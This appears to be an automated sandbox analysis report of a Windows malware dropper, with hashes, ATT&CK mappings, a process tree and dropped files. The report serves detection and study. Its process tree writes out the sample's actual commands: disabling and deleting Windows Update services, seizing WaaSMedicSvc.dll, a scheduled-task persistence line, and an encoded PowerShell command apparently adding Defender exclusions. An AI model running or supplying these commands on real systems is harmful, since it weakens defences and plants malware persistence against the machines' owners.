80930071626aa46a7ef7ebd2b285d203ebe554ea11d0799bf0395f6cb823a00a

Analysis

max time kernel
42s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
30-08-2022 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a85d7d886197d00f694f2ad8e7aa5b32.exe
Size

5.5MB
MD5

a85d7d886197d00f694f2ad8e7aa5b32
SHA1

af1424b1d292099d091aa4461ae6502412866176
SHA256

80930071626aa46a7ef7ebd2b285d203ebe554ea11d0799bf0395f6cb823a00a
SHA512

32a3f3d9b43ed92bc4514ae63e2b607e3f82469ac9cedbe49db01baf690b75545d9e54b894addd442604b0e231910d796af9512f654216630c39b4e95b6143fe
SSDEEP

98304:juWAuvKS7/fn+k45KJq7UX39Yn51g2MOw29TxmWZ3ElF68JlrcbYrCFmmO+:jkS7/fn25gH9oTw2RxxJElIglDrYt

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Executes dropped EXE 3 IoCs

Processes:

76587423657325823.exeSIJPFdhsui3sdfSF.exeWindowsAutHost

pid process

952 76587423657325823.exe
856 SIJPFdhsui3sdfSF.exe
133984 WindowsAutHost
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

133760 takeown.exe
133812 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
952	76587423657325823.exe
856	SIJPFdhsui3sdfSF.exe
133984	WindowsAutHost

pid	process
133760	takeown.exe
133812	icacls.exe

Loads dropped DLL 6 IoCs

Processes:

a85d7d886197d00f694f2ad8e7aa5b32.exetaskeng.exe

pid	process
1048	a85d7d886197d00f694f2ad8e7aa5b32.exe
1048	a85d7d886197d00f694f2ad8e7aa5b32.exe
1048	a85d7d886197d00f694f2ad8e7aa5b32.exe
1048	a85d7d886197d00f694f2ad8e7aa5b32.exe
1048	a85d7d886197d00f694f2ad8e7aa5b32.exe
133948	taskeng.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

133760 takeown.exe
133812 icacls.exe

pid	process
133760	takeown.exe
133812	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

76587423657325823.exe

description pid process target process

PID 952 set thread context of 133376 952 76587423657325823.exe AppLaunch.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

133556 sc.exe
133600 sc.exe
133644 sc.exe
133616 sc.exe
133572 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

133828 schtasks.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

134096 reg.exe
134112 reg.exe
133708 reg.exe
133736 reg.exe
133748 reg.exe
134044 reg.exe
134068 reg.exe
133692 reg.exe
133720 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exeSIJPFdhsui3sdfSF.exe

pid process

74472 powershell.exe
856 SIJPFdhsui3sdfSF.exe

description	pid	process	target process
PID 952 set thread context of 133376	952	76587423657325823.exe	AppLaunch.exe

pid	process
133556	sc.exe
133600	sc.exe
133644	sc.exe
133616	sc.exe
133572	sc.exe

pid	process
133828	schtasks.exe

pid	process
134096	reg.exe
134112	reg.exe
133708	reg.exe
133736	reg.exe
133748	reg.exe
134044	reg.exe
134068	reg.exe
133692	reg.exe
133720	reg.exe

pid	process
74472	powershell.exe
856	SIJPFdhsui3sdfSF.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeSIJPFdhsui3sdfSF.exe

description	pid	process
Token: SeDebugPrivilege	74472	powershell.exe
Token: SeShutdownPrivilege	133584	powercfg.exe
Token: SeShutdownPrivilege	133628	powercfg.exe
Token: SeShutdownPrivilege	133656	powercfg.exe
Token: SeShutdownPrivilege	133680	powercfg.exe
Token: SeTakeOwnershipPrivilege	133760	takeown.exe
Token: SeDebugPrivilege	856	SIJPFdhsui3sdfSF.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a85d7d886197d00f694f2ad8e7aa5b32.exeSIJPFdhsui3sdfSF.exe76587423657325823.execmd.execmd.exe

description	pid	process	target process
PID 1048 wrote to memory of 952	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 1048 wrote to memory of 952	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 1048 wrote to memory of 952	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 1048 wrote to memory of 952	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	76587423657325823.exe
PID 1048 wrote to memory of 856	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 1048 wrote to memory of 856	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 1048 wrote to memory of 856	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 1048 wrote to memory of 856	1048	a85d7d886197d00f694f2ad8e7aa5b32.exe	SIJPFdhsui3sdfSF.exe
PID 856 wrote to memory of 74472	856	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 856 wrote to memory of 74472	856	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 856 wrote to memory of 74472	856	SIJPFdhsui3sdfSF.exe	powershell.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 952 wrote to memory of 133376	952	76587423657325823.exe	AppLaunch.exe
PID 856 wrote to memory of 133488	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 856 wrote to memory of 133488	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 856 wrote to memory of 133488	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 856 wrote to memory of 133508	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 856 wrote to memory of 133508	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 856 wrote to memory of 133508	856	SIJPFdhsui3sdfSF.exe	cmd.exe
PID 133488 wrote to memory of 133556	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133556	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133556	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133572	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133572	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133572	133488	cmd.exe	sc.exe
PID 133508 wrote to memory of 133584	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133584	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133584	133508	cmd.exe	powercfg.exe
PID 133488 wrote to memory of 133600	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133600	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133600	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133616	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133616	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133616	133488	cmd.exe	sc.exe
PID 133508 wrote to memory of 133628	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133628	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133628	133508	cmd.exe	powercfg.exe
PID 133488 wrote to memory of 133644	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133644	133488	cmd.exe	sc.exe
PID 133488 wrote to memory of 133644	133488	cmd.exe	sc.exe
PID 133508 wrote to memory of 133656	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133656	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133656	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133680	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133680	133508	cmd.exe	powercfg.exe
PID 133508 wrote to memory of 133680	133508	cmd.exe	powercfg.exe
PID 133488 wrote to memory of 133692	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133692	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133692	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133708	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133708	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133708	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133720	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133720	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133720	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133736	133488	cmd.exe	reg.exe
PID 133488 wrote to memory of 133736	133488	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\a85d7d886197d00f694f2ad8e7aa5b32.exe
"C:\Users\Admin\AppData\Local\Temp\a85d7d886197d00f694f2ad8e7aa5b32.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
"C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:133376

C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
"C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:74472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:133488

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:133556

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:133600

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:133692

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:133644

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:133708

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:133736

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:133720

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:133760

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:133748

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:133812

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:133616

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:133572

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:134044

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:134068

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:134096

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:134112

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:134124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:133184

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:133204

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:133368

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:133400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:133508

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:133584

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:133680

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:133656

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:133628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost\""
3⤵
PID:133780

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost\""
4⤵
- Creates scheduled task(s)
PID:133828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
3⤵
PID:133852

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsAutHost"
4⤵
PID:133916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
3⤵
PID:133884

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:133928

C:\Windows\system32\taskeng.exe
taskeng.exe {6F23E221-23CA-48E0-BA3F-7BE46EF8E335} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:133948

C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
2⤵
- Executes dropped EXE
PID:133984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
3⤵
PID:134056

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
Filesize
2.9MB

MD5
4be669297a212456679f0a9528d55db8

SHA1
1cb626217a769b29925f96e335a53b5234abd71c

SHA256
0bcddcf79858de320107ff7ad93f2a27fe9dec69d8e9eb447ac1c99283d4f3d0

SHA512
8aed1ca5f76c18b40621181444d2fb9e3f4fc384a630214cd5874a8cb085b10da3d2ae26d9ac4833978eb60f466cb7469cc7e11363706ab9617adb25e5415f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
Filesize
2.9MB

MD5
4be669297a212456679f0a9528d55db8

SHA1
1cb626217a769b29925f96e335a53b5234abd71c

SHA256
0bcddcf79858de320107ff7ad93f2a27fe9dec69d8e9eb447ac1c99283d4f3d0

SHA512
8aed1ca5f76c18b40621181444d2fb9e3f4fc384a630214cd5874a8cb085b10da3d2ae26d9ac4833978eb60f466cb7469cc7e11363706ab9617adb25e5415f10

Download Submit
\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
Filesize
2.9MB

MD5
4be669297a212456679f0a9528d55db8

SHA1
1cb626217a769b29925f96e335a53b5234abd71c

SHA256
0bcddcf79858de320107ff7ad93f2a27fe9dec69d8e9eb447ac1c99283d4f3d0

SHA512
8aed1ca5f76c18b40621181444d2fb9e3f4fc384a630214cd5874a8cb085b10da3d2ae26d9ac4833978eb60f466cb7469cc7e11363706ab9617adb25e5415f10

Download Submit
\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
Filesize
2.9MB

MD5
4be669297a212456679f0a9528d55db8

SHA1
1cb626217a769b29925f96e335a53b5234abd71c

SHA256
0bcddcf79858de320107ff7ad93f2a27fe9dec69d8e9eb447ac1c99283d4f3d0

SHA512
8aed1ca5f76c18b40621181444d2fb9e3f4fc384a630214cd5874a8cb085b10da3d2ae26d9ac4833978eb60f466cb7469cc7e11363706ab9617adb25e5415f10

Download Submit
\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe
Filesize
2.9MB

MD5
4be669297a212456679f0a9528d55db8

SHA1
1cb626217a769b29925f96e335a53b5234abd71c

SHA256
0bcddcf79858de320107ff7ad93f2a27fe9dec69d8e9eb447ac1c99283d4f3d0

SHA512
8aed1ca5f76c18b40621181444d2fb9e3f4fc384a630214cd5874a8cb085b10da3d2ae26d9ac4833978eb60f466cb7469cc7e11363706ab9617adb25e5415f10

Download Submit
\Users\Admin\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
\Users\Admin\AppData\Roaming\WindowsServices\WindowsAutHost
Filesize
4.3MB

MD5
af3d0470ee39bbfd53265cae64598f6a

SHA1
6ac0b6e5d4b5c272dd612551a5f41c576517a51f

SHA256
8d4c2c303a155e37160656988860d14759914bdfd6d51a22f19342013cb3cb42

SHA512
dca92bf1bfedb6eeeed3f850289e4d7ad25b3e66f88cb1500ca1568c189bb5990873fc559c0e929bd8ab48445c8f104d843470ce40d05fecd751379a1bbb2b39

Download Submit
memory/856-65-0x000000013F6A0000-0x000000013FAF4000-memory.dmp

Filesize
4.3MB

Download
memory/856-66-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

Filesize
8KB

Download
memory/856-62-0x0000000000000000-mapping.dmp

Download
memory/952-59-0x0000000000000000-mapping.dmp

Download
memory/952-81-0x0000000000400000-0x00000000005E1000-memory.dmp

Filesize
1.9MB

Download
memory/1048-54-0x0000000076171000-0x0000000076173000-memory.dmp

Filesize
8KB

Download
memory/1344-130-0x0000000000000000-mapping.dmp

Download
memory/1760-129-0x0000000000000000-mapping.dmp

Download
memory/74472-69-0x000007FEEDBF0000-0x000007FEEE613000-memory.dmp

Filesize
10.1MB

Download
memory/74472-85-0x0000000002394000-0x0000000002397000-memory.dmp

Filesize
12KB

Download
memory/74472-84-0x000007FEED090000-0x000007FEEDBED000-memory.dmp

Filesize
11.4MB

Download
memory/74472-87-0x000000000239B000-0x00000000023BA000-memory.dmp

Filesize
124KB

Download
memory/74472-86-0x0000000002394000-0x0000000002397000-memory.dmp

Filesize
12KB

Download
memory/74472-67-0x0000000000000000-mapping.dmp

Download
memory/133184-125-0x0000000000000000-mapping.dmp

Download
memory/133204-126-0x0000000000000000-mapping.dmp

Download
memory/133368-127-0x0000000000000000-mapping.dmp

Download
memory/133376-72-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/133376-70-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/133376-79-0x000000000045B2D4-mapping.dmp

Download
memory/133376-83-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/133376-82-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/133400-128-0x0000000000000000-mapping.dmp

Download
memory/133488-88-0x0000000000000000-mapping.dmp

Download
memory/133508-89-0x0000000000000000-mapping.dmp

Download
memory/133556-90-0x0000000000000000-mapping.dmp

Download
memory/133572-91-0x0000000000000000-mapping.dmp

Download
memory/133584-92-0x0000000000000000-mapping.dmp

Download
memory/133600-93-0x0000000000000000-mapping.dmp

Download
memory/133616-94-0x0000000000000000-mapping.dmp

Download
memory/133628-95-0x0000000000000000-mapping.dmp

Download
memory/133644-96-0x0000000000000000-mapping.dmp

Download
memory/133656-97-0x0000000000000000-mapping.dmp

Download
memory/133680-98-0x0000000000000000-mapping.dmp

Download
memory/133692-99-0x0000000000000000-mapping.dmp

Download
memory/133708-100-0x0000000000000000-mapping.dmp

Download
memory/133720-101-0x0000000000000000-mapping.dmp

Download
memory/133736-102-0x0000000000000000-mapping.dmp

Download
